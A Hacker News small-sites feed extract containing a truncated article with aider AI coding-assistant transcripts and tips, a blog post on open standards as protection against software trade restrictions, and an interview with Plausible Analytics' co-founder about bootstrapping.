        ```javascript
        // Remove this duplicate declaration (around line 422):
        let routes = processedLocations.map(location => ({
            locations: [location],
            totalPassengers: location.passengerCount,
            vanAssigned: false,
            assignedVan: null,
            isSecondTrip: false
        }));
        
        // And keep only the first declaration with the debug logging:
        console.log('\n--- Creating Initial Routes ---');
        let routes = processedLocations.map(location => {
            const route = {
                locations: [location],
                totalPassengers: location.passengerCount,
                vanAssigned: false,
                assignedVan: null,
                isSecondTrip: false
            };
            console.log(`Created initial route:`, route);
            return route;
        });
        ```
        
        This will:
        1. Remove the duplicate declaration of `routes`
        2. Keep the version with the debug logging
        3. Fix the syntax error
        
        The rest of the function can remain the same.
        
        > Tokens: 12k sent, 233 received. Cost: $0.04 message, $0.90 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        I'll help create the SEARCH/REPLACE block to fix the duplicate routes declaration in app.js:
        
        app.js
        ```javascript
        <<<<<<< SEARCH
            console.log('\n--- Initializing Routes ---');
            let routes = processedLocations.map(location => ({
                locations: [location],
                totalPassengers: location.passengerCount,
                vanAssigned: false,
                assignedVan: null,
                isSecondTrip: false
            }));
            console.log('Initial routes:', routes);
        
            console.log('\n--- Merging Routes Based on Savings ---');
        =======
            console.log('\n--- Creating Initial Routes ---');
            let routes = processedLocations.map(location => {
                const route = {
                    locations: [location],
                    totalPassengers: location.passengerCount,
                    vanAssigned: false,
                    assignedVan: null,
                    isSecondTrip: false
                };
                console.log(`Created initial route:`, route);
                return route;
            });
        
            console.log('\n--- Merging Routes Based on Savings ---');
        >>>>>>> REPLACE
        ```
        
        This change:
        1. Removes the duplicate routes declaration
        2. Keeps only one initialization with better debug logging
        3. Maintains the same data structure for routes
        4. Updates the console log message to be more descriptive
        
        > Tokens: 8.0k sent, 253 received. Cost: $0.03 message, $0.93 session.  
        > Applied edit to app.js  
        > Commit 5f08ffd refactor: Remove duplicate routes declaration and improve debug logging  
        > You can use /undo to undo and discard each aider commit.  
        
    
    i'm not seeing any of the generated characters still once we regen. can we add some logging to debug this?
    
        
        Yes, let's add debug logging in key places to trace the flow and see what's happening with the character generation and parsing. Here are the changes needed:
        
        In `characters.py`, modify the `handle_character_command` function:
        
        ```python
        async def handle_character_command(command, app_state):
            if command in ('b', 'back'):
                app_state.state = "MAIN_MENU"
                return True
            else:
                messages = [
                    {"role": "user", "content": characters_prompt.format(
                        location=app_state.location)}
                ]
                logging.info("Generating characters with location: %s", app_state.location)
                result = await handle_pick_command(command, messages, app_state.characters.characters, app_state.characters.characters_choices)
                logging.info("After handle_pick_command, characters are: %s", app_state.characters.characters)
                logging.info("After handle_pick_command, choices are: %s", app_state.characters.characters_choices)
                return result
        ```
        
        And in `lm.py`, add logging to `markdown_to_list`:
        
        ```python
        def markdown_to_list(markdown_text):
            logging.info("Converting markdown to list. Input text:\n%s", markdown_text)
            
            # Split the text into lines
            lines = markdown_text.split('\n')
            
            # Initialize an empty list to store the list items
            list_items = []
            current_item = ''
        
            # Regular expression to match various list markers
            list_marker_pattern = r'^(?:\d+\.|[-•*]|\u2022)\s+'
        
            # Iterate through each line
            for line in lines:
                # Check if the line starts with any list marker
                if re.match(list_marker_pattern, line):
                    logging.info("Found list marker in line: %s", line)
                    # If there's a current item being built, add it to the list
                    if current_item:
                        list_items.append(current_item.strip())
                        current_item = ''
                    # Start a new list item
                    current_item = line
                else:
                    # If the line is a continuation of the current item, append it with a newline
                    if current_item:
                        current_item += '\n' + line
        
            # Add the last item to the list
            if current_item:
                list_items.append(current_item.strip())
        
            # Extract just the text of each list item, excluding the markers
            result = [re.sub(list_marker_pattern, '', item) for item in list_items]
            logging.info("Converted to list items: %s", result)
            return result
        ```
        
        These changes will help us see:
        1. What location is being used for generation
        2. The raw text being processed by markdown_to_list
        3. Which lines are being recognized as list items
        4. The final parsed list
        5. The state of characters and choices after processing
        
        To see the debug output, use the "debug" command in the application to enable debug logging.
        
        > Tokens: 4.3k sent, 610 received. Cost: $0.02 message, $0.07 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        I'll help add the debug logging using proper SEARCH/REPLACE blocks. First, we need to add the logging import to characters.py:
        
        characters.py
        ```python
        <<<<<<< SEARCH
        import random
        from dataclasses import dataclass, field
        
        import lm
        =======
        import random
        import logging
        from dataclasses import dataclass, field
        
        import lm
        >>>>>>> REPLACE
        ```
        
        Now modify the handle_character_command function:
        
        characters.py
        ```python
        <<<<<<< SEARCH
        async def handle_character_command(command, app_state):
            if command in ('b', 'back'):
                app_state.state = "MAIN_MENU"
                return True
            else:
                messages = [
                    {"role": "user", "content": characters_prompt.format(
                        location=app_state.location)}
                ]
                return await handle_pick_command(command, messages, app_state.characters.characters, app_state.characters.characters_choices)
        =======
        async def handle_character_command(command, app_state):
            if command in ('b', 'back'):
                app_state.state = "MAIN_MENU"
                return True
            else:
                messages = [
                    {"role": "user", "content": characters_prompt.format(
                        location=app_state.location)}
                ]
                logging.info("Generating characters with location: %s", app_state.location)
                result = await handle_pick_command(command, messages, app_state.characters.characters, app_state.characters.characters_choices)
                logging.info("After handle_pick_command, characters are: %s", app_state.characters.characters)
                logging.info("After handle_pick_command, choices are: %s", app_state.characters.characters_choices)
                return result
        >>>>>>> REPLACE
        ```
        
        And modify the markdown_to_list function:
        
        lm.py
        ```python
        <<<<<<< SEARCH
        def markdown_to_list(markdown_text):
            # Split the text into lines
            lines = markdown_text.split('\n')
        
            # Initialize an empty list to store the list items
            list_items = []
            current_item = ''
        
            # Regular expression to match various list markers
            list_marker_pattern = r'^(?:\d+\.|[-•*]|\u2022)\s+'
        
            # Iterate through each line
            for line in lines:
                # Check if the line starts with any list marker
                if re.match(list_marker_pattern, line):
                    # If there's a current item being built, add it to the list
                    if current_item:
                        list_items.append(current_item.strip())
                        current_item = ''
                    # Start a new list item
                    current_item = line
                else:
                    # If the line is a continuation of the current item, append it with a newline
                    if current_item:
                        current_item += '\n' + line
        
            # Add the last item to the list
            if current_item:
                list_items.append(current_item.strip())
        
            # Extract just the text of each list item, excluding the markers
            return [re.sub(list_marker_pattern, '', item) for item in list_items]
        =======
        def markdown_to_list(markdown_text):
            logging.info("Converting markdown to list. Input text:\n%s", markdown_text)
            
            # Split the text into lines
            lines = markdown_text.split('\n')
            
            # Initialize an empty list to store the list items
            list_items = []
            current_item = ''
        
            # Regular expression to match various list markers
            list_marker_pattern = r'^(?:\d+\.|[-•*]|\u2022)\s+'
        
            # Iterate through each line
            for line in lines:
                # Check if the line starts with any list marker
                if re.match(list_marker_pattern, line):
                    logging.info("Found list marker in line: %s", line)
                    # If there's a current item being built, add it to the list
                    if current_item:
                        list_items.append(current_item.strip())
                        current_item = ''
                    # Start a new list item
                    current_item = line
                else:
                    # If the line is a continuation of the current item, append it with a newline
                    if current_item:
                        current_item += '\n' + line
        
            # Add the last item to the list
            if current_item:
                list_items.append(current_item.strip())
        
            # Extract just the text of each list item, excluding the markers
            result = [re.sub(list_marker_pattern, '', item) for item in list_items]
            logging.info("Converted to list items: %s", result)
            return result
        >>>>>>> REPLACE
        ```
        
        > Tokens: 3.8k sent, 926 received. Cost: $0.03 message, $0.09 session.  
        > Applied edit to lm.py  
        > Applied edit to characters.py  
        > Commit 36c5dd3 feat: Add debug logging for character generation and markdown parsing  
        > You can use /undo to undo and discard each aider commit.  
        
    
    look at this log: [copy of logs]
    
        It appears that the move validation is failing because the chess.js library is case-sensitive for the square notations, but the move received from Claude is in uppercase. Let's modify the server.js file to convert the move to lowercase before validating it. Here's the change we need to make:
        
        server.js
        ```javascript
        <<<<<<< SEARCH
              const chessMove = chess.move({
                from: move.slice(0, 2),
                to: move.slice(2, 4),
                promotion: 'q' // Always promote to queen for simplicity
              });
        =======
              const chessMove = chess.move({
                from: move.slice(0, 2).toLowerCase(),
                to: move.slice(2, 4).toLowerCase(),
                promotion: 'q' // Always promote to queen for simplicity
              });
        >>>>>>> REPLACE
        ```
        
        This change ensures that the 'from' and 'to' squares are always in lowercase, which is what chess.js expects.
        
        Additionally, let's add some more logging to help diagnose any future issues:
        
        server.js
        ```javascript
        <<<<<<< SEARCH
            console.log('Processed result:', result);
        
            console.log('Sending response to client:', result);
            return res.json(result);
          } catch (error) {
            console.error('Error:', error);
            res.status(500).json({ error: 'An error occurred while processing your request.' });
          }
        =======
            console.log('Processed result:', result);
        
            console.log('Sending response to client:', result);
            return res.json(result);
          } catch (error) {
            console.error('Error:', error);
            console.error('Current FEN:', chess.fen());
            console.error('Attempted move:', move);
            res.status(500).json({ error: 'An error occurred while processing your request.' });
          }
        >>>>>>> REPLACE
        ```
        
        These changes will provide more context if an error occurs in the future.
        
        After making these changes, you should restart your server. You can do this with the following command:
        
        ```bash
        npm run start
        ```
        
        This will restart your server with the new changes. After restarting, try the chat command again and check if the move is now being correctly processed.
        
        > Tokens: 6.9k sent, 444 received. Cost: $0.03 message, $0.28 session.  
        > Applied edit to server.js  
        > Commit 813588e fix: Convert move coordinates to lowercase before validating  
        > npm run start  
        > Run shell command? (Y)es/(N)o/(D)on't ask again [Yes]: n  
        > You can use /undo to undo and discard each aider commit.  
        
    

    If you’re lost, ask for diagrams to explore system architecture / components. Visualize them using mermaid. (Upvote my PR.) If you’re using a library / API, copy documentation URLs into the chat, then ask why the code doesn’t match the examples.

    show me how the API is making calls to Claude to generate chess moves with a mermaid timing diagram (image generated after copying output into http://mermaid.live)
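
    (The diagram itself is an image in the original article; a minimal sketch of the kind of sequence diagram this prompt might produce, with hypothetical participant and endpoint names:)

    ```mermaid
    sequenceDiagram
        participant Client as React client
        participant Server as Express server
        participant Claude as Claude API
        Client->>Server: POST /chat (move command)
        Server->>Claude: prompt with current board state (FEN)
        Claude-->>Server: proposed move (e.g. "E2E4")
        Server->>Server: validate move with chess.js
        Server-->>Client: JSON response (move result, new FEN)
    ```
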
    ok let's have the text boxes for location names actually be google maps auto complete. Here's some sample code from their website. ```[sample code]```
    
        Ok, let's add Google Places Autocomplete to our location inputs. We'll need to:
        
        1. First, update the Google Maps script tag in index.html to include the places library:
        ```html
        <script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&libraries=places"></script>
        ```
        
        2. Modify the location input in renderLocations() in app.js:
        ```javascript
        function renderLocations() {
            const locationList = document.getElementById('location-list');
            locationList.innerHTML = locations.map(location => `
                <div class="location-item">
                    <input type="text" 
                           class="location-input"
                           placeholder="Enter address" 
                           value="${location.name}"
                           data-location-id="${location.id}">
                    <input type="number" 
                           min="1" 
                           value="${location.passengerCount}"
                           onchange="updatePassengerCount('${location.id}', this.value)">
                    <button onclick="deleteLocation('${location.id}')">Delete</button>
                </div>
            `).join('');
        
            // Initialize autocomplete for each location input
            document.querySelectorAll('.location-input').forEach(input => {
                const autocomplete = new google.maps.places.Autocomplete(input, {
                    fields: ['formatted_address', 'geometry'],
                    types: ['address']
                });
        
                autocomplete.addListener('place_changed', () => {
                    const place = autocomplete.getPlace();
                    if (place.formatted_address) {
                        const locationId = input.dataset.locationId;
                        updateLocationName(locationId, place.formatted_address);
                    }
                });
            });
        }
        ```
        
        3. Update the updateLocationName function to handle the full address:
        ```javascript
        function updateLocationName(id, name) {
            const location = locations.find(l => l.id === id);
            if (location) {
                location.name = name;
                // Optionally store the formatted address for display
                location.formattedAddress = name;
            }
        }
        ```
        
        4. Add some CSS to style the autocomplete dropdown:
        ```css
        .location-input {
            width: 300px;  /* or whatever width works for your layout */
        }
        
        /* Style the Google Places Autocomplete dropdown */
        .pac-container {
            z-index: 1051;
            width: 300px;
            background-color: #fff;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-shadow: 0 2px 6px rgba(0,0,0,0.3);
        }
        
        .pac-item {
            padding: 8px;
            cursor: pointer;
        }
        
        .pac-item:hover {
            background-color: #f5f5f5;
        }
        ```
        
        This will:
        1. Add autocomplete to each location input
        2. Use Google's Places service to suggest addresses
        3. Store the full formatted address when selected
        4. Style the autocomplete dropdown to match your UI
        
        The autocomplete will:
        - Show suggestions as the user types
        - Allow selection of exact addresses
        - Store the formatted address string
        - Work with the existing Google Maps distance matrix calculations
        
        Would you like me to:
        1. Add location validation
        2. Store latitude/longitude coordinates
        3. Add a map preview
        4. Something else?
        
        > Tokens: 11k sent, 660 received. Cost: $0.04 message, $0.40 session.  
        > Edit the files? (Y)es/(N)o [Yes]: y  
        
        I'll provide the SEARCH/REPLACE blocks for the changes we discussed:
        
        index.html
        ```html
        <<<<<<< SEARCH
            <script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY"></script>
        =======
            <script src="https://maps.googleapis.com/maps/api/js?key=YOUR_API_KEY&libraries=places"></script>
        >>>>>>> REPLACE
        ```
        
        app.js
        ```javascript
        <<<<<<< SEARCH
        function renderLocations() {
            const locationList = document.getElementById('location-list');
            locationList.innerHTML = locations.map(location => `
                <div class="location-item">
                    <input type="text" 
                           placeholder="Location name" 
                           value="${location.name}"
                           onchange="updateLocationName('${location.id}', this.value)">
                    <input type="number" 
                           min="1" 
                           value="${location.passengerCount}"
                           onchange="updatePassengerCount('${location.id}', this.value)">
                    <button onclick="deleteLocation('${location.id}')">Delete</button>
                </div>
            `).join('');
        }
        =======
        function renderLocations() {
            const locationList = document.getElementById('location-list');
            locationList.innerHTML = locations.map(location => `
                <div class="location-item">
                    <lt;input type="text" 
                           class="location-input"
                           placeholder="Enter address" 
                           value="${location.name}"
                           data-location-id="${location.id}">
                    <lt;input type="number" 
                           min="1" 
                           value="${location.passengerCount}"
                           onchange="updatePassengerCount('${location.id}', this.value)">
                    <button onclick="deleteLocation('${location.id}')">Delete</button>
                </div>
            `).join('');
        
            // Initialize autocomplete for each location input
            document.querySelectorAll('.location-input').forEach(input => {
                const autocomplete = new google.maps.places.Autocomplete(input, {
                    fields: ['formatted_address', 'geometry'],
                    types: ['address']
                });
        
                autocomplete.addListener('place_changed', () => {
                    const place = autocomplete.getPlace();
                    if (place.formatted_address) {
                        const locationId = input.dataset.locationId;
                        updateLocationName(locationId, place.formatted_address);
                    }
                });
            });
        }
        >>>>>>> REPLACE
        ```
        
        app.js
        ```javascript
        <<<<<<< SEARCH
        function updateLocationName(id, name) {
            const location = locations.find(l => l.id === id);
            if (location) location.name = name;
        }
        =======
        function updateLocationName(id, name) {
            const location = locations.find(l => l.id === id);
            if (location) {
                location.name = name;
                // Optionally store the formatted address for display
                location.formattedAddress = name;
            }
        }
        >>>>>>> REPLACE
        ```
        
        styles.css
        ```css
        <<<<<<< SEARCH
        input, select {
            margin: 0 5px;
            padding: 3px;
        }
        =======
        input, select {
            margin: 0 5px;
            padding: 3px;
        }
        
        .location-input {
            width: 300px;
        }
        
        /* Style the Google Places Autocomplete dropdown */
        .pac-container {
            z-index: 1051;
            width: 300px;
            background-color: #fff;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-shadow: 0 2px 6px rgba(0,0,0,0.3);
        }
        
        .pac-item {
            padding: 8px;
            cursor: pointer;
        }
        
        .pac-item:hover {
            background-color: #f5f5f5;
        }
        >>>>>>> REPLACE
        ```
        
        > Tokens: 4.5k sent, 742 received. Cost: $0.02 message, $0.42 session.  
        > Applied edit to app.js  
        > Applied edit to index.html  
        > Applied edit to styles.css  
        > Commit 7150ee4 feat: Add Google Places Autocomplete to location inputs  
        > You can use /undo to undo and discard each aider commit.
        
    

    For ambiguous changes, ask for clarifying questions. This is good to do at the start of a project. Use interface and data structure changes as high-leverage points. Changing an interface sucks in traditional dev, but in AI land it’s an easy way to concisely communicate sweeping changes.
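
    (A hypothetical example of that kind of high-leverage change for the app below: instead of describing every downstream edit, hand aider the new data shape and ask it to update everything that touches it.)

    ```javascript
    // Before: locations were plain named entries
    // { id, name, passengerCount }

    // After: a hypothetical richer shape; this one change implies
    // geocoding, distance caching, and new rendering logic downstream
    const location = {
        id: 'loc-1',
        name: '123 Main St, Springfield',
        coordinates: { lat: 40.7128, lng: -74.006 }, // filled in by a geocoder
        passengerCount: 3
    };
    ```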

    ok we're making a simple app (probably static) that helps van drivers plan who is sitting in which van, based on the number of seats in each van, the locations that each person needs to get to, and the distance between locations. start by asking some clarifying questions
    
        I'll ask some key questions to help design this van planning system:
        
        1. About the vans:
        - Do all vans have the same number of seats or do they vary?
        - Are there any special seating requirements (e.g. wheelchair spaces)?
        - How many vans are typically being planned for at once?
        
        2. About the passengers:
        - Do passengers have preferred pickup/dropoff times?
        - Are there any passengers that need to be grouped together (like families)?
        - Do any passengers have priority over others?
        
        3. About the locations:
        - Are these fixed locations or can they be any address?
        - Will you need to integrate with a mapping service to calculate distances?
        - Are there multiple stops per route or just pickup and final destination?
        
        4. About the usage:
        - Who will be using this tool (dispatchers, drivers, passengers)?
        - Does it need to handle real-time updates?
        - Should it save/export the plans?
        - Does it need to optimize for anything specific (shortest total distance, fewest vans used, etc.)?
        
        5. Technical constraints:
        - Does this need to be a web app, desktop app, or mobile app?
        - Are there any specific technologies you'd like to use?
        - Does it need to integrate with any existing systems?
        
        This will help me suggest an appropriate architecture and approach for the solution.
        
        > Tokens: 187 sent, 269 received. Cost: $0.0046 message, $0.0046 session.  
        > Edit the files? (Y)es/(N)o [Yes]: n  
        
    
    i think we want to change the format of the move received from the backend. …

    Article truncated for RSS feed. Read the full article at http://mitchgordon.me/tools/2025/02/26/aider.html

    ]]>
    http://mitchgordon.me/tools/2025/02/26/aider.html hacker-news-small-sites-43195221 Thu, 27 Feb 2025 15:28:07 GMT
    <![CDATA[Open Standards in a Trade War]]> thread link) | @cdrux
    February 27, 2025 | https://blog.devcycle.com/open-standards-in-a-trade-war/ | archive.org

    Open Standards and tech portability have never been more important—and soon, they could very well be your lifeline. In a world of looming global trade wars, it may be naive to assume that, because you work in software, you won't be impacted by tariffs, taxation and import restrictions. Just this week, tech lawyers warned that software sales could be covered by import tariffs looming on the horizon. This isn't just theoretical—it's the next economic bomb waiting to drop.

    Going forward, whether it's an AI model you're betting your company on or a SaaS suite you've grown dependent on, it is going to be critical to be able to rip and replace any software as needed, if (or more accurately, when) the winds of geopolitics shift in the wrong direction.

    The past few years have seen a growing, and now alarming acceleration away from globalism and free trade toward nationalism and protectionism. But what does that mean in practice when the software you rely on suddenly becomes caught in the middle?

    • Protectionism and Trade Disputes: Across the globe, countries are increasingly adopting protectionist policies with teeth to safeguard or shore up domestic industries, secure critical resources or fulfill national security objectives. The clearest example of this is the multi-decade project for the US to become energy independent—and software could easily be next on the "strategic asset" list.
    • Economic Fragmentation: While global trade volume is still technically growing, the rate of growth has plummeted compared to previous decades paired with a drop in foreign investment. This slowdown can be partly attributed to the increase in trade restrictions, and recent political events appear to have accelerated the trend toward economic isolationism.
    • Supply Chain Uncertainty: Growing trade restrictions and a general increase in political conflict are causing major disruptions to global supply chains. The result is delays, skyrocketing costs, and potential contract losses for businesses caught in the crossfire. Thomson Reuters considers International Politics the #1 cause of increased supply chain risk, and we've only seen the beginning.
    Just a part of the trend, Foreign Investment is declining

    What Does This Mean for Software?

    Moving beyond the trends driving economic nationalism and protectionism, there's an arsenal of trade restriction mechanisms that each economy leverages to achieve its economic and political goals. Here are some examples of how protectionist trends can result in real policies that impact the products we buy, even software.

    • Tariffs: Taxes or duties imposed on imported or exported goods, making them more expensive than domestic products. Tariffs are a classic protectionist measure used to shield domestic industries or as retaliation in trade disputes. This is clearly the most popular form of trade restriction; it has dominated the news cycle over the last month or so, with tariffs both threatened and implemented against various countries—and software licenses are an easy target.
    • Quotas: Limits on the quantity of specific goods that can be imported or exported. Import quotas restrict the supply of foreign goods, protecting domestic producers. Export quotas restrict what a foreign economy can buy, protecting strategically important products. The most famous of these quotas is the export quota placed on Nvidia GPUs to China—a stark example of how tech can become a geopolitical football overnight.
    • Embargoes and Sanctions: Government-imposed bans on trade with specific countries or in specific goods, often used for political or security reasons. The biggest of these have been the sanctions on Russia since the start of the Ukraine war, where the US and the EU attempted to ban all imports and exports to and from Russia. Your cloud provider or AI model could vanish from your tech stack overnight if that type of sanction were applied more broadly.

    While the movements of globalization and free trade throughout the 20th century helped to usher in a time of unprecedented peace and global prosperity, we have nevertheless clearly shifted back towards nationalism and economic protectionism.

    With global IT spending now over $5 trillion, it is a massive target for taxation and restriction. While software sales have traditionally been overlooked when trade restrictions are implemented, we should expect that in a more protectionist world, software will inevitably be taxed, restricted, or weaponized in some way.

    How Global IT Spend Is Divided

    So this raises the critical question: how should we prepare, as developers, users and buyers of software, for the potential of a software-based trade war that could pull the rug out from under your tech stack overnight?

    The answer is Open Standards—your only reliable escape hatch.

    Open-Standards and their Benefits

    So what are Open Standards?

    At its core, an Open Standard is just an agreement on technical details such as a schema, API, or SDK that the broader community can contribute to, with the goal of standardization. We are used to working with Open Standards in our daily lives as consumers, from the USB hardware standard that has sought to simplify the cables and connectors we use, to the HTML standard that has enabled the proliferation of software applications online.

    The typical benefits of an Open Standard are:

    • Reduced vendor lock-in
    • Increased flexibility
    • Greater interoperability between technologies

    When it comes to consumer technology, interoperability is the primary benefit, but when it comes to software that we use and purchase to help us run our companies, increased flexibility and reduced vendor lock-in become critical—potentially existential—advantages.

    And it is exactly this type of flexibility that we're looking for to reduce the risks associated with tariffs and trade restrictions that could otherwise leave your business high and dry.

    Why Open Standards Matter Now More Than Ever

    Typically what we hear in the news is that trade wars impact hard goods and commodities. The impacted products that we conjure in our minds are commodities like steel, oil, lumber and natural gas or physical products like cars or GPUs. But software is fair game too.

    This isn’t hypothetical; there’s recent precedent for a software-based trade war. In the past year global sanctions on Russia were expanded to include software as a result of the war in Ukraine. This was relatively novel at the time and felt like an extraordinary measure. But desensitization happens fast and software restrictions no longer feel extraordinary—they could become the new normal, and your tech stack could be next.

    In coming trade wars it's entirely possible that software gets hit with the double impact of government policy and popular boycott, where both consumers and businesses actively cut spending they believe flows to a country they are in conflict with—or face public backlash if they don't.

    In a situation where you may be taxed, boycotted, or completely cut off from buying software from a given country, there is a significant amount of value in increasing flexibility and giving yourself the ability to hot swap software providers before your costs increase or you're locked out and left hanging.

    This is where software that adheres to Open Standards fits in. The benefits of Open Standards are clear: reduced lock-in, increased flexibility and greater interoperability. Software providers that adopt Open Standards are signaling to their buyers that they don't want to force lock-in; they want to keep your business through quality and experience. The flip side is that if you've bought software that adheres to Open Standards, you can move providers easily if you have to. If taxes, tariffs, or restrictions become too heavy-handed for a given software provider, you can find a competitor not subject to those policies and hot-swap easily—before your business takes a critical hit.

    Now the question is: which Open Standards are the most relevant and helpful for your emergency exit strategy?

    Which Open Standards Should You Be Aware Of

    As I mentioned above, there are Open Standards for everything from hardware to the software that underpins the internet. Most of these are not relevant here, so it's important to stay aware of the Open Standards that can specifically help your business avoid lock-in on its software spend when the political winds shift.

    OpenTelemetry
    An open standard for Observability defining a core set of APIs and SDKs for generating, collecting and exporting the telemetry data used to analyze software performance and behaviour. OpenTelemetry has been around for quite a while, is mature, and has deep support in the Observability community—making it a solid lifeboat if your current monitoring solution becomes a casualty of trade wars.
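
    (A minimal sketch of what that portability looks like with the OpenTelemetry Node SDK; the exporter is the only vendor-specific piece, so swapping providers means swapping one line:)

    ```javascript
    // npm install @opentelemetry/sdk-node @opentelemetry/sdk-trace-node
    const { NodeSDK } = require('@opentelemetry/sdk-node');
    const { ConsoleSpanExporter } = require('@opentelemetry/sdk-trace-node');

    const sdk = new NodeSDK({
        // Replace ConsoleSpanExporter with any vendor's exporter to change
        // where telemetry goes; the instrumented app code is untouched.
        traceExporter: new ConsoleSpanExporter(),
    });
    sdk.start();
    ```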

    OpenFeature
    OpenFeature is an open standard for Feature Flagging that defines a core set of APIs to design your software or application around, which can then be controlled by any number of 3rd-party Feature Flag providers. OpenFeature even has a Multi-Provider designed specifically to make it easy to swap between Feature Flagging tools when your current provider suddenly becomes politically toxic.
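
    (The same idea in code, using the OpenFeature JS server SDK; the in-memory provider below stands in for any vendor's provider package, which is the one line you would swap:)

    ```javascript
    // npm install @openfeature/server-sdk
    const { OpenFeature, InMemoryProvider } = require('@openfeature/server-sdk');

    async function main() {
        // Swapping flag vendors means swapping this provider;
        // the flag-reading code below never changes.
        await OpenFeature.setProviderAndWait(new InMemoryProvider({
            'new-checkout': {
                variants: { on: true, off: false },
                defaultVariant: 'off',
                disabled: false,
            },
        }));

        const client = OpenFeature.getClient();
        const enabled = await client.getBooleanValue('new-checkout', false);
        console.log('new-checkout enabled?', enabled);
    }

    main();
    ```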

    CloudEvents
    CloudEvents is an Open Standard specification for describing event data in a common way. Its stated goal is to “dramatically simplify event declaration and delivery across services, platforms and beyond!” CloudEvents has strong industry backing and solid coverage across programming languages, meaning it has you covered for your specific stack.
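
    (For reference, a minimal CloudEvents 1.0 event in its JSON form; specversion, id, source, and type are the only required context attributes, and the source and type values here are hypothetical:)

    ```javascript
    const event = {
        specversion: '1.0',
        id: 'a1b2c3d4',
        source: '/orders/service',           // hypothetical producer URI
        type: 'com.example.order.created',   // hypothetical event type
        datacontenttype: 'application/json',
        data: { orderId: 42, total: 99.5 },
    };
    ```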

    OpenMetrics
    An Open Standard that spun out of the Open Source project Prometheus, with the goal of defining the de-facto standard for transmitting cloud-native metrics. OpenMetrics appears to be a smaller project, so we’ll be monitoring it to see if it gains traction.

    There are many other Open Standards out there and the Linux Foundation and Cloud Native Computing Foundation try their best to support as many of them as possible. You can check out the wide variety of projects they support here.

    Conclusion

    We're in a time of growing nationalism, protectionism and global political conflict that's accelerating faster than most predicted. This conflict has traditionally been fought with tariffs, restrictions and taxes on physical goods, but in the future as global software spend continues to grow, we should expect that these trade restrictions will inevitably start to be implemented on software with little warning.

    When—not if—the time comes that your software purchases are either restricted or the cost is arbitrarily increased due to political forces beyond your control, you can protect yourself and your software budgets by being prepared now. Choosing software that supports Open Standards is the best way to stay protected, because you can be confident that if you ever need to switch providers overnight, you won't be locked in when it matters most.

    The writing is on the wall: build your escape hatches now, before the trade wars reach your tech stack.

    ]]>
    https://blog.devcycle.com/open-standards-in-a-trade-war/ hacker-news-small-sites-43195194 Thu, 27 Feb 2025 15:25:48 GMT
    <![CDATA[Interview with Marko Saric, Co-Founder of Plausible (Open Source Analytics)]]> thread link) | @Liriel
    February 27, 2025 | https://docs.opensaas.sh/blog/2025-02-27-meet-marko-saric-co-founder-of-privacy-friendly-plausible-analytics/ | archive.org

    In this interview, Marko Saric shared his thoughts on privacy and running a bootstrapped SaaS business. Plausible integration is already available in Open SaaS as a privacy-friendly alternative to Google Analytics. We hope this interview helps you understand the value of such a product, and the nature of running an open source business.

    Here’s a few other things we’ve covered in this interview:

    • Tackling big tech privacy issues.
    • How bootstrapping your business fuels independence and transparency.
    • Real, practical advice for growing your SaaS the smart way.

    Let’s dive in!

    I’m Marko Saric, co-founder of Plausible Analytics.

    My journey with Plausible began with a growing awareness of the privacy issues surrounding Google and its products. For many years, I was a user of Google’s services but over time (and thanks to Snowden, Cambridge Analytica and other privacy scandals), I became more aware of the negative aspects of surveillance capitalism. This led me to explore better, more ethical alternatives to the big tech products.

    I started sharing these alternatives on my blog, which is how I connected with my co-founder Uku. We both had experience in tech and a shared vision of working on a privacy-friendly analytics tool, so we decided to work together on Plausible. I’m focused on the marketing and communication side of things, while Uku is focused on design and development.

    For those unfamiliar with Plausible, how would you describe its core mission in just a few sentences?

    Plausible Analytics is an easy to use, lightweight, open source and privacy-friendly analytics tool. Our mission is to provide website owners with useful insights while respecting visitor privacy.

    We have been working on Plausible for more than 6 years now, have more than 14,000 active subscribers at this point and have counted more than 136 billion pageviews so far.

    Data is everywhere!

    Plausible is bootstrapped and open-source—what made you choose this path instead of taking the more common VC route?

    We chose to bootstrap and open source Plausible because we wanted to maintain control and independence while also being more privacy-friendly and transparent.

    Both of us have worked at venture funded startups in the past and neither of us had good experiences with investors so going bootstrapped was pretty much the way to do this if we wanted to do things our way.

    We’re in the privacy niche so open sourcing our product allows us to build trust as people can inspect our code to verify that our actions match our words. People cannot do that with Google Analytics and other competing products.

    Just like Plausible, Wasp is an open-source project too! We’d appreciate it if you could star Wasp on GitHub as a sign of support! ⭐️

    Do you have any advice for people who are considering bootstrapping their company? Do you have any books or podcasts to recommend?

    I think it’s a good idea to start bootstrapped even if you do wish to get funded. You should focus on creating a great product that solves a real problem and on spreading the word about it. If you do that well, you’ll have investors reaching out to you even if you don’t want or need them.

    I recommend reading “Rework” by Jason Fried and David Heinemeier Hansson. It offers unconventional but valuable insights into running a startup.

    Another good book is “This Is Marketing” by Seth Godin. It’s about how many startups confuse marketing with spending money on advertising, spamming, interrupting, being annoying and other hacks and tricks. That’s not marketing. Marketing is communication.

    How did you get your first customers?

    Our first customers came through community engagement and the “build in public” movement. We shared our journey, steps taken and product development openly on our blog, social media and niche communities such as Indie Hackers. That’s how we got the early beta users and some of those became our first subscribers too.

    What were the biggest challenges you faced while building and growing Plausible?

    The first year was pretty challenging in terms of growth. Uku was working alone on Plausible trying to do both development and marketing. This is pretty much an impossible task. The growth was very slow and we made it to about 100 subscribers and $400 MRR some 14 months into the existence of Plausible.

That’s when Uku decided to look for a marketing co-founder, and that’s how we found me. Being two co-founders helped us put more time and effort into marketing and communication. One of the first things we did when I joined was to change our positioning to make it crystal clear and easy to understand what we do, what we stand for and how we compare to Google Analytics (the biggest name in our market). And then we started publishing educational and informative content covering topics such as privacy, open source, bootstrapping and startup marketing.

    I have written more about the changes we made in these early days in this post.

    Which growth strategies have been the most effective?

We have a boring marketing strategy, and we say no to all the growth hacks and other so-called best marketing practices. Content marketing has been our most effective growth strategy. As an example, the first blog post that I published (Why You Should Remove Google Analytics from Your Site) went viral on Hacker News. It drove some good traffic to our site, leading to an increase in brand awareness.

What matters is doing quality work and staying consistent with it over a long period of time, so we continued to publish multiple blog posts per week for over a year. Thanks to that work, we were fortunate enough to have viral moments on Hacker News multiple times over those first 2-3 years.

